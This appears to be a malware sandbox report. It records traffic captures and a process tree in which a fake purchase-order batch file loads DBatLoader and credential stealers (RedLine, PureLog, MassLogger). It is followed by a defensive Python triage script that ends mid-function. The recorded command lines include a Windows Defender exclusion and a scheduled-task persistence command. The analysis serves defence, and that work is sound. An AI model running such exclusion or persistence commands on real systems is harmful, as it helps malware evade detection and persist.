                                                                                                                                    Data Ascii: SNuykojOyUwvlxO/MWUuTE9AypIO6kcFLwlDZvVSTAk+DN869nPk9V9G8VzVgtc+A5Sh8JoXEQB4ZEZiucKVnkBkNOhlKaQpa+rnUM5n7eN8FZQ0JXvhlccPAZh5G2QjX+2321Lz3eXl0U30kWnJn2Uj7V7tJ/v5ow+xOWC/uR6RmY+B1EwRftVlJN9MLowM3/msXn6G0ZaT3ZUaUIIYHkG2qoldQQR0tD2s/2DyTVl1gcNpxUWU3L1sDnfRDCu
                                                                                                                                    2025-01-09 18:09:50 UTC8000INData Raw: 68 39 33 55 72 68 36 61 42 47 50 4d 4c 52 78 58 74 57 58 66 37 6c 70 61 69 74 73 58 4a 30 4c 4e 75 76 2b 43 47 4f 4a 50 32 6c 4a 4d 74 73 61 52 4f 64 48 37 70 55 31 71 78 72 66 6d 6c 69 4c 64 54 4b 38 46 38 65 47 70 69 6d 45 2f 74 41 68 32 43 6e 54 48 32 72 47 64 54 38 78 70 4c 44 69 65 43 43 53 44 59 6e 34 55 54 69 53 47 45 41 6b 53 6d 67 46 4b 49 59 63 70 63 72 63 37 43 6f 73 45 56 72 37 2f 5a 4c 4b 61 62 69 56 43 36 46 61 64 32 4f 32 6e 30 6a 5a 61 46 36 30 69 70 6c 61 47 38 71 57 2f 72 67 65 63 7a 63 70 66 30 50 68 41 6a 4e 35 5a 79 68 37 45 54 50 72 50 46 74 4c 64 4d 55 4a 34 39 73 52 2f 5a 46 41 54 6d 75 61 33 5a 37 51 37 4b 47 56 49 6a 32 72 57 31 43 5a 65 6b 32 52 43 61 64 61 34 51 59 33 53 4b 36 59 74 48 73 4e 69 62 71 6c 46 79 54 55 37 37 36 54
                                                                                                                                    Data Ascii: h93Urh6aBGPMLRxXtWXf7lpaitsXJ0LNuv+CGOJP2lJMtsaROdH7pU1qxrfmliLdTK8F8eGpimE/tAh2CnTH2rGdT8xpLDieCCSDYn4UTiSGEAkSmgFKIYcpcrc7CosEVr7/ZLKabiVC6Fad2O2n0jZaF60iplaG8qW/rgeczcpf0PhAjN5Zyh7ETPrPFtLdMUJ49sR/ZFATmua3Z7Q7KGVIj2rW1CZek2RCada4QY3SK6YtHsNibqlFyTU776T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49866 | 104.21.80.1 | 443 | 1664 | C:\Users\user\AppData\Local\Temp\Microsofts.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 18:09:58 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-09 18:09:58 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Thu, 09 Jan 2025 18:09:58 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1760988
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ss95Nd%2FvHcmMJM96T8qyoZRBFEmUmXClUqjLU%2FVqcAdS%2B6TWYR1JxxdSP8KukeHrVGrew%2Fo5xidc%2FTgJviXku7LhUVmoJQ4HfGakJWeXyMlSuOBuL9A4gZDtyhBrQPc1okMO38CW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff661a74ba1c443-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1536&min_rtt=1532&rtt_var=583&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1862244&cwnd=244&unsent_bytes=0&cid=92ce6d36e821e216&ts=294&x=0"
2025-01-09 18:09:58 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Target ID: 0
Start time: 13:09:22
Start date: 09/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#3_RKG367.bat" "
Imagebase: 0x7ff6a5f10000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 13:09:22
Start date: 09/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 13:09:44
Start date: 09/01/2025
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: findstr /e "'v" "C:\Users\user\Desktop\PO#3_RKG367.bat"
Imagebase: 0x7ff7bc380000
File size: 36'352 bytes
MD5 hash: 804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 13:09:44
Start date: 09/01/2025
Path: C:\Windows\System32\cscript.exe
Wow64 process (32bit): false
Commandline: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
Imagebase: 0x7ff7eaac0000
File size: 161'280 bytes
MD5 hash: 24590BF74BBBBFD7D7AC070F4E3C44FD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 13:09:45
Start date: 09/01/2025
Path: C:\Users\user\AppData\Local\Temp\x.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\x.exe
Imagebase: 0x400000
File size: 1'317'376 bytes
MD5 hash: E337ECD5680D121D6DD649956DC716CA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000006.00000002.2536406675.000000007FAA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000006.00000002.2464206701.0000000002266000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 47%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 8
Start time: 13:09:50
Start date: 09/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase: 0x1c0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 13:09:51
Start date: 09/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 13:09:51
Start date: 09/01/2025
                                                                                                                                    Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:175'800 bytes
                                                                                                                                    MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000003.2448553311.000000002D0DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000001.2446233147.00000000013E0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 3%, ReversingLabs
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:12
                                                                                                                                    Start time:13:09:54
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                    Imagebase:0x780000
                                                                                                                                    File size:70'656 bytes
                                                                                                                                    MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                    • Detection: 79%, ReversingLabs
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:13
                                                                                                                                    Start time:13:09:54
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                                                                                                                                    Imagebase:0x350000
                                                                                                                                    File size:98'816 bytes
                                                                                                                                    MD5 hash:F6B8018A27BCDBAA35778849B586D31B
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4634725765.000000000269F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, Author: unknown
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4634725765.0000000002794000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown
                                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                    • Detection: 91%, ReversingLabs
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:14
                                                                                                                                    Start time:13:09:56
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                                    Imagebase:0xe70000
                                                                                                                                    File size:433'152 bytes
                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:15
                                                                                                                                    Start time:13:09:56
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:16
                                                                                                                                    Start time:13:09:56
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                    Imagebase:0x320000
                                                                                                                                    File size:187'904 bytes
                                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:17
                                                                                                                                    Start time:13:09:56
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:18
                                                                                                                                    Start time:13:10:01
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                    Imagebase:0x7ff717f30000
                                                                                                                                    File size:496'640 bytes
                                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:21
                                                                                                                                    Start time:13:10:05
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Users\Public\Libraries\Oupzhkpr.PIF
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\Public\Libraries\Oupzhkpr.PIF"
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:1'317'376 bytes
                                                                                                                                    MD5 hash:E337ECD5680D121D6DD649956DC716CA
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                    • Detection: 47%, ReversingLabs
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:22
                                                                                                                                    Start time:13:10:06
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                    Imagebase:0x1c0000
                                                                                                                                    File size:236'544 bytes
                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:23
                                                                                                                                    Start time:13:10:06
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:24
                                                                                                                                    Start time:13:10:06
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:175'800 bytes
                                                                                                                                    MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.2745277954.0000000034B30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.2741756362.00000000343B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.2718853988.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000003.2609245491.000000002FFBA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.2740855997.0000000032F75000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:25
                                                                                                                                    Start time:13:10:20
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Users\Public\Libraries\Oupzhkpr.PIF
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\Public\Libraries\Oupzhkpr.PIF"
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:1'317'376 bytes
                                                                                                                                    MD5 hash:E337ECD5680D121D6DD649956DC716CA
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:26
                                                                                                                                    Start time:13:10:20
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                    Imagebase:0x7ff642ec0000
                                                                                                                                    File size:21'312 bytes
                                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:27
                                                                                                                                    Start time:13:10:22
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                    Imagebase:0x790000
                                                                                                                                    File size:236'544 bytes
                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:28
                                                                                                                                    Start time:13:10:22
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:29
                                                                                                                                    Start time:13:10:22
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:175'800 bytes
                                                                                                                                    MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001D.00000002.2840097800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001D.00000003.2772871636.00000000234E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001D.00000002.2871352037.0000000025380000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001D.00000001.2760141830.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001D.00000002.2881899810.0000000026485000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001D.00000002.2869962358.00000000250F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001D.00000002.2869415210.0000000024E93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:30
                                                                                                                                    Start time:13:10:41
                                                                                                                                    Start date:09/01/2025
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                                                                                                                                    Imagebase:0xf0000
                                                                                                                                    File size:665'670'656 bytes
                                                                                                                                    MD5 hash:10751439BD30D4B3066935F2DFFDC3C7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                    Has exited:false
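The process table above is the kind of record a responder triages by hand. As an added example, not part of the Joe Sandbox report, the following Python parses the key:value records in the form they take on this page and applies the checks that matter here: execution from a user-writable path, a PE image under a misleading extension such as .pif, an oversized image, administrator privileges from a profile path, YARA hits, and whether the process was still running when the analysis ended. The input is a transcription of the entries for target IDs 23 to 26 and 30; the size threshold and the directory list are assumptions, not report values.

```python
import ntpath
from typing import Dict, List

LARGE_FILE_BYTES = 100 * 1024 * 1024          # assumption: images above this are treated as padded
SUSPICIOUS_DIRS = ("\\users\\public\\", "\\appdata\\roaming\\")  # assumption: user-writable, rarely hosts PEs
ODD_PE_EXTENSIONS = {".pif", ".scr", ".com"}  # run as PE images, rarely used by benign software

# Constructed input: a subset of the report's process table, copied as it appears on the page.
PROCESS_TABLE = """\
Target ID:23
Path:C:\\Windows\\System32\\conhost.exe
File size:862'208 bytes
Has administrator privileges:false
Has exited:true

Target ID:24
Path:C:\\Users\\Public\\Libraries\\rpkhzpuO.pif
File size:175'800 bytes
Has administrator privileges:false
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.2745277954.0000000034B30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:true

Target ID:25
Path:C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF
File size:1'317'376 bytes
Has administrator privileges:false
Has exited:true

Target ID:26
Path:C:\\Windows\\System32\\dllhost.exe
File size:21'312 bytes
Has administrator privileges:false
Has exited:true

Target ID:30
Path:C:\\Users\\user\\AppData\\Roaming\\ACCApi\\apihost.exe
File size:665'670'656 bytes
Has administrator privileges:true
Has exited:false
"""


def parse_process_table(text: str) -> List[Dict[str, object]]:
    """One dict per blank-line-separated record; bullet lines collect under the preceding key."""
    records, current, last_key = [], {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                records.append(current)
                current, last_key = {}, None
            continue
        if line.startswith("•") and last_key:
            current.setdefault(last_key, []).append(line.lstrip("• ").strip())
            continue
        key, _, value = line.partition(":")        # split on the first colon only
        key, value = key.strip(), value.strip()
        current[key] = [] if value == "" else value
        last_key = key
    if current:
        records.append(current)
    return records


def parse_size(value: str) -> int:
    """'665'670'656 bytes' -> 665670656 (the report groups digits with apostrophes)."""
    return int(value.replace("'", "").split()[0])


def triage_process(rec: Dict[str, object]) -> List[str]:
    findings = []
    lower = str(rec.get("Path", "")).lower()
    in_user_dir = any(d in lower for d in SUSPICIOUS_DIRS)
    if in_user_dir:
        findings.append("executes from user-writable directory")
    ext = ntpath.splitext(lower)[1]
    if ext in ODD_PE_EXTENSIONS:
        findings.append(f"PE image with misleading extension {ext}")
    size = parse_size(str(rec.get("File size", "0 bytes")))
    if size > LARGE_FILE_BYTES:
        findings.append(f"oversized image ({size} bytes), likely padded")
    if rec.get("Has administrator privileges") == "true" and in_user_dir:
        findings.append("runs with administrator privileges from a user profile path")
    rules = sorted({m.split(",")[0].replace("Rule:", "", 1).strip() for m in rec.get("Yara matches", [])})
    if rules:
        findings.append("YARA: " + ", ".join(rules))
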